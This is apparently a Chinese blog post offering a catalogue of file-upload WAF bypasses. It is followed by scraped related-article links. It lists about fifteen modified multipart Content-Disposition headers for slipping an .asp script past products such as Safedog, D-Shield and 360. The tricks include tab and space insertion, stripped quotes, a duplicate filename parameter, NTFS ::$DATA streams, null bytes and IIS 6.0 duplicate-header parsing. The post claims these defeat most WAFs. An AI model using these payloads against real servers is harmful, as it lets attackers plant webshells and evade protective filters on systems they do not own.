原始默认状态:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp”

Content-Type: text/html

突破0,文件名前缀加[0x09]绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”[0x09]backlion.asp”

Content-Type: text/html

突破1,文件名去掉双引号绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=backlion.asp

Content-Type: text/html

突破2,添加一个filename1的文件名参数,并赋值绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp”;filename1=”test.jpg”

Content-Type: text/html

突破3, form变量改成f+orm组合绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: f+orm-data; name=”filepath”;filename=”backlion.asp”

Content-Type: text/html

突破4 ,文件名后缀大小写绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.Asp”

Content-Type: text/html

突破5 ,去掉form-data变量绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: name=”filepath”; filename=”backlion.asp”

Content-Type: text/html

突破6,在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data                                 ; name=”filepath”; filename=”backlion.asp”

Content-Type: text/html

或者:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition:                                                                                form-data ; name=”filepath”; filename=”baclion.asp”

Content-Type: text/html

突破7 ,backlion.asp . (空格+.)绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp .”

Content-Type: text/html

突破8 ,“回车换行,绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp


Content-Type: text/html

突破9 ,NTFS流 在文件名后加::$DATA绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp::$DATA”

Content-Type: text/html

或者

——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp::$DATA\0x00\fuck.asp0x00.jpg”

Content-Type: text/html

突破10, 经过对IIS 6.0的测试发现,其总是采用第一个Content-Disposition中的值做为接收参数,而安全狗总是以最后一个Content-Disposition中的值做为接收参数。因此尝试构造如下请求[上传backlion.asp成功]:

Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.asp”

—————————–15377259221471

Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.txt”

Content-Type: application/octet-stream

Content-Disposition: form-data; name=”FileUploadName”; filename=”backlion.asp”

Content-Disposition: form-data;

name=”FileUploadName”; filename=”backlion.asp”

突破11,将Content-Type和ConTent-Disposition调换顺序位置绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Type: text/html

ConTent-Disposition: form-data; name=”filepath”; filename=”backlion.asp”

突破12,在文件名前缀加空格(tab键可替换)绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=    “backlion.asp”

Content-Type: text/html

突破13,在form-data加空格绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data;      name=”uploaded”; filename=”backlion.asp”

Content-Type: text/html

突破14,在form-data的前后加上+绕过:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: +form-data; name=”filepath”; filename=”backlion.asp”

Content-Type: text/html

或者:

——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data+; name=”filepath”; filename=”backlion.asp”

Content-Type: text/html

在上述的方法中,还有些方法可以过安全狗,也可以过D盾、360网站卫士等等。另外从上述方法中,若按你们的想法,会分成那些类型?我在这里统一划分为特性和WAF解析不当(PS下,我不是学术派,较口语化)i,特性包括系统特性,协议特性等等,比如上述中,大多数都属于协议的特性,因为FORM-DATA的协议十分松散;部分属于系统特性,比如加空格、点号、NTFS流等等。而解析不当,比如上述的第二种添加一个filename1,这种在正常情况下无法使用的,如果第0种,对特殊字符无法解析,归根到底也是WAF对内容解析的不当处理。以上方法可以绕过目前大部分waf了,即使防住了,结合下有时候会出现超乎想像的结果

上传绕过WAF的tips大全的更多相关文章

  1. 上传绕过WAF几种常见的姿势

    1:WTS-WAF 绕过上传原内容:Content-Disposition: form-data; name="up_picture"; filename="xss.ph ...

  2. 文件上传绕过WAF

    文件上传 文件上传实质上还是客户端的POST请求,消息主体是一些上传信息.前端上传页面需要指定 enctype为multipart/from-data才能正常上传文件. 此处不讲各种中间件解析漏洞只列 ...

  3. [9期]软WAF上传绕过+webshell免杀

    安全狗上传绕过 思路: 1.扰乱编码 form-data 替换成 ~form-data           form-data    改成 f+orm-data form-data    改成 for ...

  4. Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过

    Kali Linux Web 渗透测试视频教程—第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...

  5. CTF---Web入门第二题 上传绕过

    上传绕过分值:10 来源: Justatest 难度:易 参与人数:5847人 Get Flag:2272人 答题人数:2345人 解题通过率:97% bypass the upload 格式:fla ...

  6. 实验吧_程序逻辑问题(代码审计)&上传绕过

    一开始我先随便输入了几个账号名字进行测试,发现当输入的账号名为admin时会发生报错 经过测试果然是一个注入点 当拿到admin密码后发现根本没用,没办法另寻他路 审查元素时发现提示index.txt ...

  7. 实验吧—Web——WP之 上传绕过

    我们先上传一个png文件,发现他说必须上传后缀名为PHP的文件才可以,那么,我们尝试一下,PHP文件 但是他又说不被允许的文件类型 在上传绕过里最有名的的就是00截断,那么我们就先要抓包 在这里我们需 ...

  8. [原题复现+审计][SUCTF 2019] WEB CheckIn(上传绕过、.user.ini)

    简介  原题复现:https://github.com/team-su/SUCTF-2019/tree/master/Web/checkIn  考察知识点:上传绕过..user.ini  线上平台:h ...

  9. 文件上传之WAF绕过及相安全防护

    文件上传在数据包中可修改的地方 Content-Disposition:一般可更改 name:表单参数值,不能更改 filename:文件名,可以更改 Content-Type:文件 MIME,视情况 ...

随机推荐

  1. LeetCode: Min Stack 解题报告

    Min Stack My Submissions Question Solution Design a stack that supports push, pop, top, and retrievi ...

  2. 续写上一篇的数组or指针操作

    C语言,同样使用if else while 这样的语法,但不同的人,就是有不同的实现方式,甚至是技巧. eg: #include <stdio.h> #include<string. ...

  3. 一款纯css3实现的数字统计游戏

    今天给大家分享一款纯css3实现的数字统计游戏.这款游戏的规则的是将所有的数字相加等于72.这款游戏的数字按钮做得很美观,需要的时候可以借用下.一起看下效果图: 在线预览   源码下载 实现的代码. ...

  4. spring session实现集群中session共享

    本文转自:http://dorole.com/1422/ 使用框架的会话管理工具,也就是本文要说的spring-session,可以理解是替换了Servlet那一套会话管理,既不依赖容器,又不需要改动 ...

  5. Servlet入门(第一个Servlet的Web程序)

    新建maven项目,注意项目的类型 project名为ServletExample 点击Finish.建立maven项目完毕例如以下 生成后的文件夹没有java源代码文件夹.依照maven的约定,还要 ...

  6. POJ 3253-Fence Repair(堆)

    Fence Repair Time Limit: 2000MS   Memory Limit: 65536K Total Submissions: 27055   Accepted: 8800 Des ...

  7. Oracle分页(limit方式的运用)

    select * from a_matrix_navigation_map where rowid not in(select rowid from a_matrix_navigation_map w ...

  8. 02 Architecture Overview

    本章提要---------------------------------------------arthiecture, and some componentconnect to oracle这一章 ...

  9. Windows通用知识讲解二

    NMAKE Makefile是一个解释执行的工具,根据Makefile文件中的定义,编译和链接程序,最终生成文件. Makefile(Windows下是.mak文件) 定义编译和链接等操作的脚本文件( ...

  10. 【转】WebService 的创建,部署和使用

    WebService,即Web服务,能使得运行在不同机器上的不同应用无须借助,专门的第三方软件或硬件,就可相互交换数据或集成. 第一次选择WebService,是为了替代数据库远程连接.我们都知道当S ...